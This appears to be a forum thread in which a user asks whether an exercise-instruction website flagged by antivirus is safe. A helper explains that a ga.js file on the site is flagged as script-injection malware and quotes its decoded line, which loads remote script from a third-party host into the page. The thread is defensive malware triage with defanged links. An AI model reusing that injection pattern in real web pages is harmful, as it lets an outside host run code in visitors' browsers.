I was using a guide for stretching and one of the links that shows a certain pose led to this website:
http://ww w.exrx.net/Stretches/HipAbductors/LyingCrossover .html
after going on the website a message came up about blocking a trj but after using a few site checkers, none of them said the site was bad
im just curious to get another opinion on whether the site is unsafe or not
thanks
There is another uri hxtp://exrx.net/Calculators/ga.js
on that site (break that link, please) that has Website Malware MW:JS:GEN2?web.js.script-injection.002
See: https://oscarotero.com/embed/demo/index.php?url=http%3A%2F%2Fexrx.net%2FCalculators%2Fga.js+&options[minImageWidth]=0&options[minImageHeight]=0&options[facebookAccessToken]=&options[embedlyKey]=&options[soundcloudClientId]=YOUR_CLIENT_ID&options[oembedParameters]=
When decoded the code is
gads.src = 'htxp://www.regretfulmorning.com/wp-content/cache/supercache/cache.php';node.parentNode.insertBefore(gads, node);
polonus
So should i still be ok or is this other malware a problem i have to worry about now?
@j2721822
When it is both flagged as malicious by Avast and also by a Sucuri scan, you need not be the sharpest knife in the store to know that it is better to stay away from that website until it is no longer flagged. It could be just an obfuscated SE redirect, it could be more like a Google Analytics Trojan …just don’t take risks until it is being confirmed…
Thanks for reporting here.
polonus
Oh yes, i was not planning on using that website, i was just more concerned about if my computer itself is currently at risk but as you said, ill wait for the confirmation
Thanks for being so helpful ;D
Do not worry that much, your AV has prevented you from ever connecting to that ga.js javascript, so whenever this is/was a real threat it could not have done any damage to your computer system.
polonus